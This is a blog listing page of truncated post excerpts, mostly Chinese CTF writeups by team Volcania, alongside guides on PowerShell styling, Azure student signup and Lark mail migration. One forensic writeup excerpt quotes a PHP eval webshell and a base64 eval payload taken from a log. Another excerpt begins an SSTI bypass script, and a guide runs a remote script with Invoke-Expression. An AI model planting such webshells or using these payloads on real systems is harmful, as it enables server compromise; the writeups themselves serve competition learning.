【Volcania】软件系统安全赛 CCSSSC 2025 华南赛区区域线下赛复盘
吐槽话在前头:这是我们队第二次打线下赛,第一次是鹏城杯决赛,但是因为考虑到保密问题所以我没写复盘
喜欢我队友下载取证 5 个 G 的附件 20KB/s 剩余时间 3 天嘛?还是说,喜欢的是我根本就进不去比赛平台 ♪
笑死了,华南赛区这边刚开始根本就进不去平台,好不容易我们队四个有一个队友进去了,结果自己的账号密码忘记了先用的我的,后面说可以重置账号密码,上报后说重置完了(为统一的一个强密码),结果还是登不进去,这不是重置了个寂寞吗…… 最后一个队四个人三个人用我的号,剩下一个队友用自己的
还有还有,怎么有赛事主办方提供的附件(babymooer 的附件)对系统有要求啊(据说是 Win 10 22H2 测试通过),导致我们没有任何一个人能打开这个附件(附加调试器打开就蓝屏了)
还有还有还有,从早上八点半打到下午三点半,连饭都没得吃,饿死啦!!!(哭~~~~~~
比赛题目这次比赛共有 8 道题目,其中有 3 道 Web 题,一道 re 题,剩下的都是 MISC 题
题目列表在这里
题目名称
题目分类
题目描述
题目备注
babymooer
Reverse (驱动)
...
【Volcania】2025 数字创新中国大赛数字安全赛道时空数据安全赛题暨三明市第五届 “红名谷” 杯大赛初赛 Writeup
MISC 异常行为溯源 | @Luminoria @Ron
某企业网络安全部门人员正在对企业网络资产受到的攻击行为进行溯源分析,该工作人员发现攻击者删除了一段时间内的访问日志数据,但是攻击者曾传输过已被删除的访问日志数据并且被流量监控设备捕获,工作人员对流量数据进行了初步过滤并提取出了相应数据包。已知该攻击者在开始时曾尝试低密度的攻击,发现未被相关安全人员及时发现后进行了连续多日的攻击,请协助企业排查并定位攻击者 IP,flag 格式为:flag {md5 (IP)}
出现了三种协议:TCP、giFT 和 X11
只把 TCP 提取出来的 log 并不完整,缺少了很多东西,giFT 数据量太少且不具有参考价值
但是可以看到数据的格式
最开始是经过 Base64 编码的内容,例如
1eyJtc2ciOiJNemt1TVRrekxqWTJMakkwTlMwZ0xTQmJNRGd2U21GdUx6SXdNalU2TVRrNk5EUTZOVGtnS3pBd01EQmRJQ0pIUlZRZ0wyRndjQzlzYVhOMExuQm9jQ0JJVkZSUUx6RXVNU0lnTWpBd0lETTBOek1 ...
美化我的 Windows Powershell 全纪录
这,是 Windows Terminal 下的 Powershell
在每天的 coding 中,我都要与它打交道,久而久之,我发现它有点单调,于是我萌生了美化它的想法
前置条件
Powershell 7+(必须)
https://github.com/PowerShell/PowerShell/releases/
Powershell 的设置中允许用户运行脚本(必须)
使用 Set-ExecutionPolicy 来进行设置,后面跟着级别(例如 RemoteSigned、unrestricted)等,可以加 - user 来只对本用户进行修改
Windows Terminal(Win11 自带,Win10 必须)
scoop(可选)
备份在做美化之前,我强烈建议你进行一次备份,直接搜索创建还原点然后根据按钮提示进行备份就可以了
安装 scoop(可选)使用这条命令安装 scoop
1Invoke-Expression (New-Object System.Net.WebClient).DownloadString ('https://get.scoop.sh')
如果遇到错误提 ...
使用教育邮箱注册 AZ100(Azure 100$ 教育优惠)
自从拿到教育邮箱,我就在想怎么样才能够用尽其用,拿到更多的教育优惠资源,然后今天我就盘了盘 Azure,据说 Azure 对学生有每年 100$ 的免费额度,这我不得赶紧下个手
注册教育用户首先,你得先去 Azure 登录一个微软账号(可以是个人的)
Azure Portal: https://portal.azure.com/
登陆以后会进入 Azure 的主页,我们不需要在这个页面操作,先把它关掉,只需要有登录态就可以了
接着我们打开 AZ100 的注册页面
AZ100: https://signup.azure.com/studentverification?offerType=1&srcurl=https%3A%2F%2Fazure.microsoft.com%2Ffree%2Fstudents&correlationId=bbc11038-628a-4b5a-abf5-e141999f96d9
在这个页面中,填写自己的个人信息,注意有些信息的真实性(例如你明明用的是 @*.edu.cn 你的国家还选其他的那肯定不对)
填好了以后提交(验证码留空就行,除非你有),然后打开你的教 ...
VNCTF2025 个人 Writeup(垂死挣扎记录)
官方 WP:http://ctf-files.bili33.top/VNCTF2025/VNCTF2025%20Official%20Writeup.pdf
[Reverse] Hook Fish
钓到的鱼怎么跑了?
下载下来一个 apk 文件,丢进 jadx 查看 AndroidManifest.xml 看到第一个 Activity 是 com.example.hihitt.MainActivity
找到 Activity 看到里面有一些函数
123456789101112131415161718192021222324252627282930313233343536373839404142434445 public void loadClass (String input0) { String input1 = encode (input0); File dexFile = new File (getExternalFilesDir (Environment.DIRECTORY_DOWNLOADS), "hook_fish.dex"); ...
迁移自定义域名邮箱服务到 Larksuite(飞书国际版)
前言在昨天早上,我起床后日常刷手机,突然看到了这一条消息
于是我打开了 Office 365,想看看我有没有被算账,结果就是不出意外的出意外了,我的 E5 也没了
于是我赶紧打开微信通知组织里面的用户,让他们赶紧迁移数据后,我开始寻找 Office 365 的替代品
对我来说,我其实还有个 Office 365 E3 MSDN 的子账户,所以对于软件的影响并不大,而我的 onedrive 里面也没有什么贵重的东西,而且也少用。最麻烦的就是我的自定义域名邮箱(本站的评论通知)是托管在微软那里的,而如果没有 Office 授权,账号是用不了 Outlook 的,所以我得寻找一个能够替代它的服务,最后 Lark 出现在了我的视野里
准备工作
一个工作情况良好的梯子
对自己域名 DNS 设置的访问权限
已经创建完 “公司” 的 lark 账号(强烈建议直接 Google 或者 Apple 登录)
绑定域名点到除了首页以外的任何一个 Lark 页面,在登录后,右上角有个由 9 个点组成的图标,点一下就能看到管理后台了(前提是管理员账户)
直接进入管理后台界面,在上面找到产品设置,然后在里面就能够看到邮箱
在域名管理里面可以看到添加域名(我这里 ...
【Volcania】第八届西湖论剑・网络安全大会初赛 Writeup
我猜你是那种下载文件夹里一堆 “西湖论剑附件”,16:00 的时候看着自己的排名发现自己论剑论了个寂寞的玩家
[DS] easydatalog | @Luminoria | 未出
请你对附件中的日志文件进行分析,找出 “张三” 的身份证号和手机号,譬如其身份证号是 119795199308186673,手机号是 73628276413,则提交的 flag 为 “119795199308186673_73628276413”。
打开附件,发现 error.log 体积比较大,里面有很多的内容
204 行发现一句话木马 <?php eval ($_POST [1]);?>
252 行及后面发现多行 b64 编码内容,且每个的内容不一样
1@eval (@base64_decode ($_POST ['lc134a7d99e04f']));&lc134a7d99e04f=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXI ...
【Volcania】2025 软件系统安全赛华南赛区(CCSSSC2025)Writeup - TEAM Volcania
钓鱼邮件 | @Luminoria
Bob 收到了一份钓鱼邮件,请找出木马的回连地址和端口。 假如回连地址和端口为 123.213.123.123:1234,那么敏感信息为 MD5 (123.213.123.123:1234),即 d9bdd0390849615555d1f75fa854b14f,以 Cyberchef 的结果为准。
附件是邮件的 eml 文件,处理一下,删除部分标记,可以得到附件部分的 base64 编码值,尝试赛博厨师解码,发现 PK 头
用 Python 处理,写成文件
1234567891011import base64with open ("email.txt") as f: data = f.read ().replace ("\r\n", "") with open ("raw.txt","wt") as f: f.write (data) with open ("file","wb") as f: dec_data = base ...
【Volcania】2025 CISCN x 长城杯铁人三项 初赛 Writeup
[WEB] Safe_Proxy | @RonSSTI 题,用学校的祖传脚本一把梭
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899def generate_number (num:int): num_map = { 0:'([]|length)', 1:'([g]|length)', 5:'(()|select|string|wordcount)', 6:'(()|select|string|urlencode|wordcount)', 12:'([g,g,g]|wordcount) ...
2024 年 GDUTCTF 个人 WriteUp
日志分析
近日 xxa 集团的某终端遭到 DNS 劫持的恶意攻击,导致大量的服务器、应用、个人终端都无法正常的访问,请找出被劫持的服务器 IP
打开后在 Wireshark 里面过滤器填写 dns,过滤所有的 DNS 请求
然后随便拉一下就发现,有对外网 DNS 服务器进行查询的操作,这个 IP 是 61.7.12.5,所以答案为 flag {61.7.12.5}
RSA
yafu
题目说了用 yafu,咱就上 yafu 呗
123456789101112131415161718192021> .\yafu-x64.exe "factor (5732964453789005656202220060994030976008462483974106949360656685503394408870148542074882576415254144726130307660083216338644162341371153570939410807509529736550955786833199064934462338627066079768583784202430670910414267735660 ...